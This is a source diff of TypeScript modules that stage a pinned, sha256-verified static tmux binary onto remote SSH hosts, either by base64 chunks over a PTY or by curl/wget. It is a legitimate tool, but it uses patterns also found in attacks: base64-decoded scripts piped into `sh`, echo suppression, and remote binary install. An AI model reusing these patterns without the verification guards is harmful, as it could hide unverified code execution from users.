+// A) but read by buildTmuxPushControlScript, which runs as a DIFFERENT `sh`
+// process piped in via `base64 -d | sh` (PID B, a child of A). `$$` is each
+// process's OWN pid, so a literal `$$` embedded in this constant resolves to
+// A's pid everywhere the interactive shell expands it, and to B's pid
+// wherever the piped `sh` expands it — two DIFFERENT values, proven
+// empirically in this worktree (writing `.ccc-tmux-push.<A>.b64` then piping
+// a script that reads `.ccc-tmux-push.$$.b64` into `sh` produced `sh: line 1:
+// .../ .ccc-tmux-push.44268.b64: No such file or directory`, a pid that
+// belonged to neither the writer nor anything the caller controlled). A
+// constant string can therefore NEVER be the accumulator path — it has to be
+// captured ONCE, by shell A, into a variable that is `export`ed so shell B
+// inherits the SAME already-expanded value via its environment rather than
+// re-deriving `$$` itself. `buildTmuxPushLines` emits that capture as its own
+// line (`PUSH_ACCUMULATOR_VAR=$HOME/.../.ccc-tmux-push.$$.b64; export
+// PUSH_ACCUMULATOR_VAR`) BEFORE any chunk line, and every reference below —
+// both the chunk lines' `>>` target and the control script's `<` source —
+// reads `"$PUSH_ACCUMULATOR_VAR"`, never the raw path, so there is exactly
+// ONE place `$$` is ever evaluated for this file.
+//
+// PUSH_ARCHIVE_PATH and PUSH_DEST_TMP_PATH have NO such hazard: both are used
+// exclusively inside buildTmuxPushControlScript, i.e. entirely within the
+// single piped `sh` process (PID B) — every reference to `$$` in either one
+// resolves to the SAME pid throughout that one script, so leaving them as
+// literal `$$`-suffixed constants is safe.
+// Exported (not just module-private) so pty-manager.ts's tier-4 abort-recovery
+// path (#242 round-3 MINOR fix) can emit `rm -f "$PUSH_ACCUMULATOR_PATH"` off
+// the SAME literal this module uses for the write side, rather than a second
+// hand-typed copy of the variable name that could silently drift from it.
+export const PUSH_ACCUMULATOR_VAR = 'PUSH_ACCUMULATOR_PATH'
+const PUSH_ARCHIVE_PATH = '$HOME/.claude/bin/.ccc-tmux-push.$$.tar.gz'
+const PUSH_DEST_TMP_PATH = '$HOME/.claude/bin/.tmux-push.$$'
+const PUSH_DEST_PATH = '$HOME/.claude/bin/tmux'
+
+export interface TmuxPushInput {
+  /** Which tmux-builds release asset the pushed bytes came from — selects
+   *  the embedded sha256 digest to re-verify against on the remote. */
+  arch: TmuxStageTarget
+  /** Full base64 encoding of the cached, host-verified v3.7b .tar.gz bytes
+   *  for `arch`. Pure input — this module never touches fs or the network;
+   *  pty-manager.ts resolves this from `app.getPath('userData')/tmux-cache/`
+   *  (downloading once and caching thereafter) before calling in here. */
+  tarGzBase64: string
+  /**
+   * #242 finding F1 (b): host-generated per-session nonce (randomId(),
+   * src/shared/id.ts), embedded in every sentinel `buildTmuxPushControlScript`
+   * emits. Same SECOND-layer contract as ssh-tmux-stage.ts's `nonce` param —
+   * see that module's doc comment on buildTmuxStageScript for the honest
+   * limitation (defeated by a tty-reader; the fixed STAGED_TMUX_BIN_EXPR
+   * literal buildTmuxLaunchCommand embeds for this tier, ssh-tmux.ts, is
+   * what survives that).
+   */
+  nonce: string
+}
+
+/**
+ * Split a base64 string into `maxLen`-sized lines. Exported so both
+ * buildTmuxPushLines' default chunking AND the max-line-length invariant
+ * itself are directly testable against arbitrary inputs.
+ *
+ * Deliberately NOT regex-based (a lazy `.match(/.{1,N}/g)` on a ~1.7M-char
+ * string is exactly the kind of thing that risks pathological backtracking
+ * on some regex engines) — a plain index loop is linear regardless of input
+ * size.
+ */
+export function chunkBase64(b64: string, maxLen: number = PUSH_B64_LINE_MAX): string[] {
+  if (b64.length === 0) return ['']
+  const out: string[] = []
+  for (let i = 0; i < b64.length; i += maxLen) out.push(b64.slice(i, i + maxLen))
+  return out
+}
+
+/**
+ * Build the small remote control script that runs ONCE all chunk lines have
+ * landed: decode the accumulated base64 file back into the archive, RE-VERIFY
+ * its sha256 on the remote (acceptance (a) — never trust that ~600+
+ * individually-typed lines sent over an interactive PTY arrived byte-for-byte;
+ * a single dropped/duplicated/reordered keystroke on a flaky link silently
+ * installs a corrupt binary otherwise, and the host's OWN pre-push digest
+ * check — real as it is — says nothing about what actually survived the
+ * wire), THEN extract/chmod/install/smoke-report using the exact same
+ * sibling-temp-then-mv install pattern ssh-tmux-stage.ts's round-2 fix
+ * established (never truncate a possibly-already-installed live path;
+ * chmod the SIBLING temp, only `mv -f` it into place once tar has confirmed
+ * success), THEN run the exact same detached smoke test tier 3's round-2
+ * BLOCKER fix established (`tmux -V` then a DETACHED `new-session -d -s
+ * <name> true`, immediately `kill-session`ing the probe on success) BEFORE
+ * ever emitting `ok`, and finally emit the SAME `ccc-tmux-stage ok/fail`
+ * sentinel tier 3 uses, so pty-manager's existing `parseTmuxStageSentinel`
+ * needs no changes to understand tier 4's outcome too.
+ *
+ * #242 round-3 BLOCKER fix: the smoke test was missing entirely from the
+ * prior version of this function -- it went digest-check -> tar -> chmod ->
+ * mv -f -> straight to `ok path=...` with no verification the binary can
+ * actually OPEN A TERMINAL. That re-arms the EXACT landmine tier 3's own
+ * round-2 BLOCKER fix removed (see ssh-tmux-stage.ts's doc comment on
+ * buildTmuxStageScript, step 5, for the full mechanism): the tier-2 probe in
+ * ssh-shim.ts (`fs.accessSync(path, X_OK)`) checks EXECUTABILITY ONLY, never
+ * runs the binary, so an installed-but-terminfo-broken tmux is reported as
+ * `setup ok tmux=...` on every future session to this host, and
+ * `buildTmuxLaunchCommand` (ssh-tmux.ts) emits `<bin> new-session -A -s
+ * ccc-<sid> '<claude...>'` with NO `|| claude` fallback -- tmux dies with
+ * "open terminal failed" and claude never starts, permanently, on a host
+ * population (egress-less minimal containers) that is if anything MORE
+ * likely than tier 3's to have no terminfo database. On smoke failure the
+ * binary is removed (reported removal, not silent -- the fail=terminfo
+ * sentinel still fires) so the tier-2 X_OK-only probe can never find it
+ * again and re-wrap claude in a dead tmux.
+ *
+ * Returned as RAW shell text — buildTmuxPushLines (below) is the one that
+ * base64-wraps it before it ever becomes a line pty-manager writes to a
+ * live PTY. Exported only for the structural tests in ssh-tmux-push.test.ts,
+ * which decode the wrapped line back to this text to assert the sha256
+ * gate's program order.
+ */
+export function buildTmuxPushControlScript(arch: TmuxStageTarget, nonce: string): string {
+  // #242 finding F1 (b): sink-side guard, before nonce is interpolated into
+  // the sentinel lines below -- see ssh-tmux-stage.ts's assertSafeNonce.
+  assertSafeNonce(nonce)
+  const sha256 = TMUX_STAGE_SHA256[arch]
+  return [
+    // `"$PUSH_ACCUMULATOR_VAR"` — NOT a literal `$$`-suffixed path — so this
+    // script (running as a piped `sh`, a different process than the
+    // interactive shell that wrote the chunk lines) reads the SAME path the
+    // writer used, inherited via the exported env var rather than
+    // re-derived from this process's own pid. See PUSH_ACCUMULATOR_VAR's doc
+    // comment above (#242 round-2 BLOCKER fix).
+    `base64 -d < "$${PUSH_ACCUMULATOR_VAR}" > ${PUSH_ARCHIVE_PATH} 2>/dev/null`,
+    `rm -f "$${PUSH_ACCUMULATOR_VAR}"`,
+    `if command -v sha256sum >/dev/null 2>&1; then ` +
+      `echo "${sha256}  ${PUSH_ARCHIVE_PATH}" | sha256sum -c - >/dev/null 2>&1; _pdgok=$?; ` +
+    `else ` +
+      `echo "${sha256}  ${PUSH_ARCHIVE_PATH}" | shasum -a 256 -c - >/dev/null 2>&1; _pdgok=$?; ` +
+    `fi`,
+    `if [ "$_pdgok" != "0" ]; then rm -f ${PUSH_ARCHIVE_PATH}; echo "${TMUX_STAGE_SENTINEL_PREFIX} ${nonce} fail=digest"; else ` +
+      `if tar -xzf ${PUSH_ARCHIVE_PATH} -O tmux > ${PUSH_DEST_TMP_PATH} 2>/dev/null; then ` +
+        `chmod 755 ${PUSH_DEST_TMP_PATH}; mv -f ${PUSH_DEST_TMP_PATH} ${PUSH_DEST_PATH}; rm -f ${PUSH_ARCHIVE_PATH}; ` +
+        // #242 round-3 BLOCKER fix: smoke-test the just-installed binary
+        // BEFORE reporting ok -- see this function's doc comment for why an
+        // install that "succeeds" without this is a permanent landmine on
+        // exactly the host population (egress-less minimal containers) tier
+        // 4 targets. Mirrors ssh-tmux-stage.ts's tier-3 smoke test verbatim:
+        // `tmux -V` (binary runs) THEN a detached `new-session -d -s <name>
+        // true` (binary can actually open a terminal) -- `-V` alone never
+        // touches a terminal and would miss a missing terminfo database.
+        `_psmoke="ccc-tmux-push-smoke-$$"; ` +
+        `if "${PUSH_DEST_PATH}" -V >/dev/null 2>&1 && "${PUSH_DEST_PATH}" new-session -d -s "$_psmoke" true; then ` +
+          `"${PUSH_DEST_PATH}" kill-session -t "$_psmoke" >/dev/null 2>&1; ` +
+          `echo "${TMUX_STAGE_SENTINEL_PREFIX} ${nonce} ok path=${PUSH_DEST_PATH}"; ` +
+        `else ` +
+          // Reported removal, not silent -- the fail=terminfo sentinel below
+          // still fires. Leaving the binary in place would let the tier-2
+          // X_OK-only probe (ssh-shim.ts) find it on every FUTURE session to
+          // this host and wrap claude in a tmux that cannot open a terminal.
+          `rm -f ${PUSH_DEST_PATH}; echo "${TMUX_STAGE_SENTINEL_PREFIX} ${nonce} fail=terminfo"; ` +
+        `fi; ` +
+      `else ` +
+        `rm -f ${PUSH_DEST_TMP_PATH} ${PUSH_ARCHIVE_PATH}; echo "${TMUX_STAGE_SENTINEL_PREFIX} ${nonce} fail=extract"; ` +
+      `fi; ` +
+    `fi`,
+  ].join('; ')
+}
+
+/**
+ * Build the ordered list of shell command LINES pty-manager writes to the
+ * PTY, one '\r'-terminated write per line (see buildTmuxPushCommand below
+ * for the joined wire form).
+ *
+ * Shape:
+ *   1. `stty -echo`               — acceptance (b): a ~1.27 MB transfer sent
+ *      one bounded line at a time must never be echoed into the visible
+ *      pane. This is the FIRST line, submitted and executed before any
+ *      chunk line is sent, so it protects every line that follows.
+ *   2. `mkdir -p ~/.claude/bin`    — defensive; tier 1/2/3 already create
+ *      it, but tier 4 can be the FIRST thing to run on a truly bare host.
+ *   3. `<var>=<tmp.b64 path>; export <var>` — capture the accumulator path
+ *      ONCE, in the interactive shell, into an exported variable (#242
+ *      round-2 BLOCKER fix — see PUSH_ACCUMULATOR_VAR's doc comment: a
+ *      literal `$$`-suffixed path resolves to a DIFFERENT pid in the piped
+ *      `sh` the control script (step N+1) runs in, so it can never be a bare
+ *      constant shared between writer and reader).
+ *   4. `: > "$<var>"`              — truncate/create the accumulator file.
+ *   5..N. `echo '<chunk>' >> "$<var>"` — one per `chunkBase64()` slice.
+ *      Safe to leave as PLAINTEXT shell text (not base64-wrapped) even
+ *      though `stty -echo` may not have taken visible effect for the very
+ *      first few of these (ioctl race) — a base64 alphabet chunk can NEVER
+ *      contain the sentinel's literal `-` characters (`ccc-tmux-stage`),
+ *      so even a fully-echoed chunk line cannot satisfy
+ *      `parseTmuxStageSentinel`'s regex. Opacity-by-alphabet, not by timing.
+ *   N+1. the control script (buildTmuxPushControlScript), base64-wrapped —
+ *      UNLIKE the chunk lines, this one's plaintext genuinely contains the
+ *      sentinel literals (`ccc-tmux-stage ok path=…` / `fail=…`), so it gets
+ *      the EXACT same echo-immunity fix buildTmuxStageCommand needed
+ *      (#242 round-3 MAJOR): wrap it in base64 so the line the terminal
+ *      echoes back WHILE IT IS BEING TYPED is opaque, and the real sentinel
+ *      is only ever emitted by the DECODED script's own `echo`, once it has
+ *      actually run — not a re-parse of the same typed bytes.
+ *   N+2. `stty echo`              — restore echo once the transfer + control
+ *      script have both run.
+ */
+export function buildTmuxPushLines(input: TmuxPushInput): string[] {
+  if (!SAFE_B64_RE.test(input.tarGzBase64)) {
+    // Absorbable: attemptTmuxPush's call site (pty-manager.ts) already
+    // wraps this in a try/catch that falls through to the bare unwrapped
+    // launch on any build failure — a throw here is exactly that path, not
+    // a new failure mode.
+    throw new Error('buildTmuxPushLines: tarGzBase64 is not valid base64 -- refusing to interpolate into remote shell text')
+  }
+  const lines: string[] = []
+  lines.push('stty -echo 2>/dev/null')
+  lines.push('mkdir -p "$HOME/.claude/bin" 2>/dev/null')
+  // Capture the accumulator path ONCE, here, in the interactive shell that
+  // is about to type every chunk line below -- see PUSH_ACCUMULATOR_VAR's
+  // doc comment for why this can't be a bare `$$`-suffixed constant.
+  lines.push(`${PUSH_ACCUMULATOR_VAR}=$HOME/.claude/bin/.ccc-tmux-push.$$.b64; export ${PUSH_ACCUMULATOR_VAR}`)
+  lines.push(`: > "$${PUSH_ACCUMULATOR_VAR}"`)
+  for (const chunk of chunkBase64(input.tarGzBase64)) {
+    lines.push(`echo '${chunk}' >> "$${PUSH_ACCUMULATOR_VAR}"`)
+  }
+  const controlB64 = Buffer.from(buildTmuxPushControlScript(input.arch, input.nonce)).toString('base64')
+  lines.push(`echo '${controlB64}' | base64 -d | sh`)
+  lines.push('stty echo 2>/dev/null')
+  return lines
+}
+
+/**
+ * Join buildTmuxPushLines' output into the single string pty-manager feeds
+ * through `runChunkedWrite` (pty-chunked-write.ts) rather than a single
+ * `ptyProcess.write()` call. That distinction matters: runChunkedWrite
+ * slices this string into small (WRITE_CHUNK_SIZE) byte-writes purely to
+ * avoid overflowing WinPTY/ConPTY's OWN input buffer — it has no concept of
+ * "lines" and doesn't need one, because the '\r' characters embedded here
+ * are preserved across however many small writes it takes to deliver them,
+ * and the remote tty's canonical-mode line discipline reassembles complete
+ * lines regardless of how many discrete writes delivered the bytes. The
+ * two chunking schemes protect against two INDEPENDENT limits: this
+ * module's line-length cap (PUSH_B64_LINE_MAX) guards the remote tty's
+ * per-line canonical-mode buffer; runChunkedWrite's byte-chunking guards
+ * the LOCAL pty backend's write buffer. Neither substitutes for the other.
+ */
+export function buildTmuxPushCommand(input: TmuxPushInput): string {
+  return buildTmuxPushLines(input).map((line) => `${line}\r`).join('')
+}
+
+/** Sentinel prefix for the arch probe below. Distinct from
+ *  TMUX_STAGE_SENTINEL_PREFIX so pty-manager's existing
+ *  isStagingWrite-shaped write-classification (it distinguishes writes by
+ *  substring, e.g. `base64 -d | sh` vs `base64 -d | node`) never confuses
+ *  a probe write for a real tier-3/4 completion write. */
+export const ARCH_PROBE_SENTINEL_PREFIX = 'ccc-tmux-push-arch'
+
+/**
+ * Build the tiny remote arch probe pty-manager writes BEFORE it knows
+ * whether tier 4 will even run — cheap enough (a bare `uname`) to fire
+ * alongside tier 3's staging attempt with no meaningful cost, so arch is
+ * already known by the time (if ever) a `fail=download` sentinel arrives.
+ *
+ * Deliberately PLAINTEXT, not base64-wrapped like buildTmuxStageCommand —
+ * and this is a considered choice, not an oversight. The round-3 tier-3 bug
+ * this codebase already paid for was that a value with NO internal
+ * whitespace (`$HOME/.claude/bin/tmux`) sits immediately after `path=` as one
+ * contiguous non-whitespace run, so the terminal's pre-execution echo of the
+ * as-typed line (which DOES include the trailing \r\n from pressing Enter)
+ * satisfies a regex requiring `(\S+)` immediately followed by a line
+ * terminator. This probe's value is `$(uname -s)-$(uname -m)` — command
+ * substitution syntax that itself CONTAINS a space (`uname -s`) before the
+ * unexpanded, pre-execution echo ever reaches a line terminator, so `\S+`
+ * cannot span it: `parseArchProbeSentinel`'s capture group cannot match the
+ * as-typed line, only the REAL post-execution output where the shell has
+ * already substituted in a space-free `<os>-<machine>` string. Base64-wrapping
+ * this one would also collide with the SAME `base64 -d | sh` substring
+ * pty-manager's staging-write test helper matches on to locate the tier-3
+ * write, needlessly complicating that call site for a value that doesn't
+ * need the treatment.
+ */
+export function buildArchProbeCommand(): string {
+  return `echo "${ARCH_PROBE_SENTINEL_PREFIX} $(uname -s)-$(uname -m)"`
+}
+
+/**
+ * Bracket `buildArchProbeCommand()`'s output in the same `stty -echo` /
+ * `stty echo` pair `buildTmuxStageCommand` uses around ITS payload (#242
+ * round-3 MINOR fix) — the raw probe command, echoed back plaintext while
+ * being typed, and its plaintext reply, were otherwise the only thing tier
+ * 3/4 writes to a visible pane (every other write on this ladder is either
+ * base64-opaque or explicitly echo-suppressed). NOT base64-wrapped, unlike
+ * buildTmuxStageCommand's payload — see `buildArchProbeCommand`'s own doc
+ * comment for why plaintext is already safe against its own parser here;
+ * base64-wrapping it too would needlessly collide with the SAME `base64 -d |
+ * sh` substring pty-manager's own tests use to distinguish the tier-3
+ * staging write from everything else this call site sends.
+ */
+export function buildArchProbeCommandBracketed(): string {
+  return `stty -echo 2>/dev/null; ${buildArchProbeCommand()}; stty echo 2>/dev/null`
+}
+
+/**
+ * The exact four-way `uname -s`/`uname -m` combo table
+ * `buildTmuxStageScript` (ssh-tmux-stage.ts) embeds as remote shell
+ * `case`/`esac` text, re-expressed as a callable TS function — the HOST
+ * side needs this as CODE (to pick which cached archive to push), whereas
+ * tier 3's remote script only ever needs it as shell text.
+ */
+export function mapUnameToTarget(combo: string): TmuxStageTarget | null {
+  switch (combo) {
+    case 'Linux-x86_64': return 'linux-x86_64'
+    case 'Linux-aarch64':
+    case 'Linux-arm64': return 'linux-arm64'
+    case 'Darwin-x86_64': return 'macos-x86_64'
+    case 'Darwin-arm64': return 'macos-arm64'
+    default: return null
+  }
+}
+
+/**
+ * Parse `buildArchProbeCommand`'s eventual reply off the remote PTY stream.
+ * Same chunk-boundary discipline as parseTmuxSentinel/parseTmuxStageSentinel
+ * in pty-manager.ts: the captured combo must be immediately followed by a
+ * line terminator, so a chunk boundary landing mid-combo returns `undefined`
+ * (caller leaves arch pending) rather than a truncated value. An
+ * unrecognised combo (mapUnameToTarget returns null) also returns `null`
+ * here — a caller must treat that the same as "never arrived": there is no
+ * cached archive to select for an arch tier 4 doesn't recognise.
+ */
+export function parseArchProbeSentinel(data: string): TmuxStageTarget | null | undefined {
+  const m = data.match(new RegExp(`${ARCH_PROBE_SENTINEL_PREFIX} (\\S+)(?=[\\r\\n])`))
+  if (!m) return undefined
+  return mapUnameToTarget(m[1])
+}

--- a/src/main/ssh-tmux-stage.ts
+++ b/src/main/ssh-tmux-stage.ts
@@ -1,0 +1,363 @@
+/**
+ * ssh-tmux-stage.ts — pure builder for tier 3 of the #242 tmux-detection
+ * ladder: staging a static tmux binary onto a remote host that has NEITHER
+ * a PATH tmux (tier 1) NOR a previously-staged `~/.claude/bin/tmux` (tier
+ * 2, see the probe in ssh-shim.ts / generateRemoteSetupScript). Mirrors the
+ * ssh-tmux.ts / ssh-args.ts pattern: a dependency-free string builder so the
+ * exact shell fragment is unit-testable without the pty-manager dependency
+ * graph, called from pty-manager once a `setup ok tmux=none` sentinel is
+ * seen (tiers 4/5 — host-side base64 push, `--continue` degradation —
+ * arrive in items 4/5 and are NOT implemented here).
+ *
+ * Two exports, mirroring `generateRemoteSetupScript` / `getRemoteSetupCommand`
+ * in ssh-shim.ts:
+ *   - `buildTmuxStageScript()` — the raw POSIX `sh` fragment (statements
+ *     joined with `;`, not real newlines), readable text, for structural
+ *     unit tests to assert against directly.
+ *   - `buildTmuxStageCommand()` — what pty-manager ACTUALLY
+ *     `ptyProcess.write()`s: the script above, base64-encoded and piped
+ *     through `base64 -d | sh` inside an `stty -echo`/`stty echo` bracket,
+ *     so the sentinel literals the script emits never appear in the
+ *     terminal's echo of the command being typed (#242 round-3 MAJOR fix —
+ *     see the doc comment on `buildTmuxStageCommand` itself).
+ *
+ * No default export (project convention).
+ */
+
+export type TmuxStageTarget = 'linux-x86_64' | 'linux-arm64' | 'macos-x86_64' | 'macos-arm64'
+
+/**
+ * Upstream release tag. Pinned, not `latest` — a floating tag means the
+ * sha256 constants below (fetched against THIS exact tag) silently stop
+ * matching whatever `latest` resolves to on the day tmux-builds cuts a new
+ * release, degrading every future staging attempt to `fail=digest` with no
+ * code change to explain why. A version bump is a reviewed diff: bump the
+ * tag AND re-fetch/re-verify the four digests together.
+ */
+export const TMUX_STAGE_TAG = 'v3.7b'
+
+/**
+ * Per-arch sha256 digests for the tmux-builds v3.7b static build archives
+ * (each archive contains a single top-level `tmux` file — verified by
+ * listing one with `tar -tzf` during implementation).
+ *
+ * Source: GitHub's own per-release-asset `digest` field —
+ *   https://api.github.com/repos/tmux/tmux-builds/releases/tags/v3.7b
+ * (`assets[].digest`, format `sha256:<hex>`). That API field is GitHub's
+ * own attestation, not a value tmux-builds' CI hands back — so it was
+ * cross-checked (#242 implementation) by independently downloading BOTH
+ * Linux artifacts and recomputing sha256 locally with
+ * `Get-FileHash -Algorithm SHA256`; both matched the API's `digest` field
+ * byte-for-byte. The macOS pair is taken from the same API field without a
+ * second independent download (no macOS runner available here) — same
+ * mechanism, same trust level as the two verified entries.
+ */
+export const TMUX_STAGE_SHA256: Record<TmuxStageTarget, string> = {
+  'linux-x86_64': 'f85e6c1c412750a774eb3f370f33bad05fc726fb8b6a0b174ad6f0b6d954df58',
+  'linux-arm64': 'b2955782695283fbc3682a2f77d65616f53b986ee3cf3d80618d3b1cb95b91a6',
+  'macos-x86_64': 'ea90f0d8e8998cf5a3a5921e985685844a13a7c3b5779f36870bd98b7f147fe6',
+  'macos-arm64': 'ee66dbcd49613eb41dc6b2f3abc5cd39d9135d67b7dfef1fdb180a3dbdc01f1e',
+}
+
+/**
+ * Shared prefix for both outcome sentinels this fragment can emit:
+ *   `ccc-tmux-stage ok path=<abs-path>`
+ *   `ccc-tmux-stage fail=<reason>`
+ * Exported so pty-manager's parser builds its regex off the SAME literal
+ * rather than a second hand-typed copy that could drift (mirrors why
+ * SAFE_TMUX_BIN_RE in ssh-tmux.ts is exported instead of re-declared at
+ * each consumer).
+ */
+export const TMUX_STAGE_SENTINEL_PREFIX = 'ccc-tmux-stage'
+
+/**
+ * Shared URL parts for the tmux-builds v3.7b release asset -- factored out
+ * so the REMOTE shell fragment (buildTmuxStageScript, where the arch suffix
+ * is a shell variable resolved at runtime via uname) and the HOST-side
+ * downloader (tmuxStageAssetUrl, called from pty-manager.ts's tier-4 push
+ * with a concrete, already-known arch) can never independently drift on the
+ * owner/repo, release tag, or filename template (#242 finding F6). Only the
+ * arch suffix differs between the two call sites -- a TS string for the
+ * host, a shell variable for the remote.
+ */
+const TMUX_RELEASE_OWNER_REPO = 'tmux/tmux-builds'
+const TMUX_ASSET_FILENAME_PREFIX = `tmux-${TMUX_STAGE_TAG.slice(1)}-`
+const TMUX_ASSET_FILENAME_SUFFIX = '.tar.gz'
+
+function tmuxReleaseBaseUrl(): string {
+  return `https://github.com/${TMUX_RELEASE_OWNER_REPO}/releases/download/${TMUX_STAGE_TAG}`
+}
+
+/**
+ * The exact URL pty-manager.ts's tier-4 host-side downloader
+ * (downloadAndCacheTmuxArchive) fetches for a given, already-known arch --
+ * built from the SAME parts (owner/repo, tag, filename template) as the
+ * remote curl/wget URL buildTmuxStageScript embeds as shell text, so the two
+ * cannot silently drift apart (#242 finding F6). See ssh-tmux-push.test.ts's
+ * regression test tying them together.
+ */
+export function tmuxStageAssetUrl(arch: TmuxStageTarget): string {
+  return `${tmuxReleaseBaseUrl()}/${TMUX_ASSET_FILENAME_PREFIX}${arch}${TMUX_ASSET_FILENAME_SUFFIX}`
+}
+
+/**
+ * Sink-side charset guard (#242 finding F8, defence-in-depth). Every other
+ * shell/argv-facing sink in this codebase asserts its own inputs at the
+ * point of interpolation rather than trusting an upstream check (see
+ * assertSafeRemotePath in providers/claude/ssh-shim.ts, assertNotOptionLike/
+ * isSafeTmuxBin in ssh-tmux.ts). Nothing untrusted flows into
+ * TMUX_STAGE_TAG / TMUX_STAGE_SHA256 / TMUX_STAGE_SENTINEL_PREFIX today --
+ * all three are module constants -- but a future edit that widens any of
+ * them to a configurable or remote-derived value would otherwise sail
+ * straight into remote shell text (this function) and into
+ * parseTmuxStageSentinel's `new RegExp(...)` construction (pty-manager.ts)
+ * with no gate at all. Throws (never silently coerces); writeTmuxStageCmd
+ * (pty-manager.ts) already wraps buildTmuxStageCommand() in try/catch and
+ * falls through to the bare launch, so a throw here is absorbed exactly
+ * like any other build failure on this ladder.
+ */
+/**
+ * #242 finding F1 (b), NONCE charset guard. `nonce` is host-generated
+ * (`randomId()`, src/shared/id.ts -- lowercase hex only) but is interpolated
+ * into remote shell text (this function's caller) AND into
+ * parseTmuxStageSentinel's `new RegExp(...)` (pty-manager.ts) unescaped --
+ * same hazard shape as TMUX_STAGE_SENTINEL_PREFIX below. Asserting the
+ * charset here, at the one place both builders (stage + push) route through
+ * before interpolating it, means a future caller that widens where the
+ * nonce comes from can't silently reopen either hazard.
+ */
+export function assertSafeNonce(nonce: string): void {
+  if (!/^[A-Za-z0-9]+$/.test(nonce)) {
+    throw new Error(`Refusing to build tmux stage script: nonce "${nonce}" fails the charset guard (expected [A-Za-z0-9]+).`)
+  }
+}
+
+function assertSafeTmuxStageConstants(nonce: string): void {
+  if (!/^v[0-9A-Za-z.]+$/.test(TMUX_STAGE_TAG)) {
+    throw new Error(`Refusing to build tmux stage script: TMUX_STAGE_TAG "${TMUX_STAGE_TAG}" fails the version-tag charset guard.`)
+  }
+  for (const [arch, sha] of Object.entries(TMUX_STAGE_SHA256)) {
+    if (!/^[0-9a-f]{64}$/.test(sha)) {
+      throw new Error(`Refusing to build tmux stage script: TMUX_STAGE_SHA256["${arch}"] is not a 64-char lowercase hex sha256 digest.`)
+    }
+  }
+  // Also guards the sentinel-prefix half of this finding: the SAME literal
+  // is interpolated into parseTmuxStageSentinel's `new RegExp(...)`
+  // (pty-manager.ts) unescaped -- a value outside this charset could change
+  // that regex's meaning, not just this shell fragment.
+  if (!/^[A-Za-z0-9_-]+$/.test(TMUX_STAGE_SENTINEL_PREFIX)) {
+    throw new Error(`Refusing to build tmux stage script: TMUX_STAGE_SENTINEL_PREFIX "${TMUX_STAGE_SENTINEL_PREFIX}" fails the charset guard.`)
+  }
+  assertSafeNonce(nonce)
+}
+
+/**
+ * Build the RAW tier-3 staging script — the POSIX `sh` fragment that
+ * actually performs detection/download/verify/install/smoke-test. Exported
+ * so the structural tests below (sha256 gate, version pin, terminfo probe,
+ * etc.) can assert against readable shell text. NOT what pty-manager writes
+ * to the PTY — see `buildTmuxStageCommand` below, which base64-wraps this
+ * exact output before it ever reaches a live terminal.
+ *
+ * Steps, in order (each gates the next — no step runs on a prior failure):
+ *   1. `uname -s` / `uname -m` -> one of the four tmux-builds targets.
+ *      Unrecognised combo -> `fail=arch`, nothing downloaded.
+ *   2. `curl -fsSL <url> -o <tmp> || wget -qO- <url> > <tmp>` — curl first
+ *      (nearly universal, fails closed on HTTP errors with `-f`), wget as
+ *      the fallback for images that ship it instead. Empty/missing result
+ *      -> `fail=download`.
+ *   3. sha256 the downloaded archive against the embedded per-arch digest.
+ *      `sha256sum -c` (GNU/Linux) with a `shasum -a 256 -c` fallback (BSD /
+ *      macOS, which has no sha256sum by default). Mismatch -> `fail=digest`,
+ *      temp file removed, NOTHING installed — the install step below is
+ *      reached only through this gate.
+ *   4. Extract the single `tmux` member to a SIBLING temp file inside
+ *      `$HOME/.claude/bin/` (`.tmux.$$`, same directory as the final
+ *      destination so the later `mv` is same-filesystem/atomic), `chmod 755`
+ *      IT (not the final path), and only `mv -f` it onto
+ *      `$HOME/.claude/bin/tmux` once `tar` has reported success. Extract
+ *      failure -> `rm -f` the sibling temp + `fail=extract`, leaving
+ *      whatever was ALREADY at the install path (nothing, on a fresh host)
+ *      completely untouched.
+ *
+ *      Fixes an adversarial-review BLOCKER-adjacent finding (#242 round 2,
+ *      MAJOR): the previous shape (`tar -xzf ... -O tmux >
+ *      "$HOME/.claude/bin/tmux"`) has the shell TRUNCATE the destination
+ *      the instant the redirect opens, before `tar` has extracted a single
+ *      byte — so a failed extract (bad archive, `tar` not supporting `-O`
+ *      on some minimal image, etc.) left a 0-byte file sitting at the
+ *      install path with whatever mode a PRIOR install had left it in. This
+ *      app is explicitly a multi-session orchestrator (the whole point of
+ *      CCC), so two SSH sessions to the same tmux-less host stage
+ *      concurrently and would otherwise interleave writes into that one
+ *      live path. Extracting to a sibling and `mv`-ing into place only on
+ *      confirmed success means a losing/failing concurrent stage can only
+ *      ever clobber ITS OWN temp file, never the other session's
+ *      already-installed (or still-installing) binary.
+ *   5. Smoke test: `tmux -V` (binary actually runs) then a DETACHED
+ *      `new-session -d -s <name> true` — the shape that surfaces "missing
+ *      or unsuitable terminal" on a bare/minimal container with no terminfo
+ *      database, which `-V` alone would not catch (it never touches a
+ *      terminal). Immediately `kill-session`s the probe on success. Smoke
+ *      failure -> `rm -f` the just-installed binary, THEN `fail=terminfo`.
+ *
+ *      Fixes an adversarial-review BLOCKER (#242 round 2): the prior version
+ *      left the chmod-755 binary in place on smoke failure, reasoning that
+ *      "remove nothing silently" meant never removing it. That reading
+ *      missed the actual hazard — the tier-2 probe in ssh-shim.ts
+ *      (`fs.accessSync(path.join(claudeDir,'bin','tmux'), fs.constants.X_OK)`)
+ *      checks EXECUTABILITY ONLY, never runs the binary, so it cannot see
+ *      that this exact file fails the terminfo smoke test. Session 1 stages,
+ *      smoke fails, `fail=terminfo`, falls through to a bare launch (fine).
+ *      Session 2 (or session 1 reconnecting later) to the SAME host: tier 2
+ *      finds the still-executable file, reports `setup ok tmux=...`,
+ *      pty-manager wraps claude in it, and `buildTmuxLaunchCommand` (see
+ *      ssh-tmux.ts) emits `<bin> new-session -A -s ccc-<sid> '<claude...>'`
+ *      with NO `|| claude` fallback — tmux dies with "open terminal failed:
+ *      missing or unsuitable terminal" and claude never starts, permanently,
+ *      because staging never re-runs once tier 2 reports a hit. Removing the
+ *      binary here is NOT the "remove nothing silently" the spec forbade —
+ *      the sentinel is still echoed, so the failure is reported, just not
+ *      left behind as a live landmine at the exact path the next session's
+ *      probe trusts.
+ *   6. Success -> `ok path=$HOME/.claude/bin/tmux` (shell-expanded, so the
+ *      sentinel carries an absolute path — never a literal `~`, which
+ *      `isSafeTmuxBin`'s allowlist in ssh-tmux.ts rejects outright).
+ *
+ * `nonce` (#242 finding F1 (b)): host-generated per-session random token
+ * (randomId(), src/shared/id.ts), embedded in EVERY sentinel this script
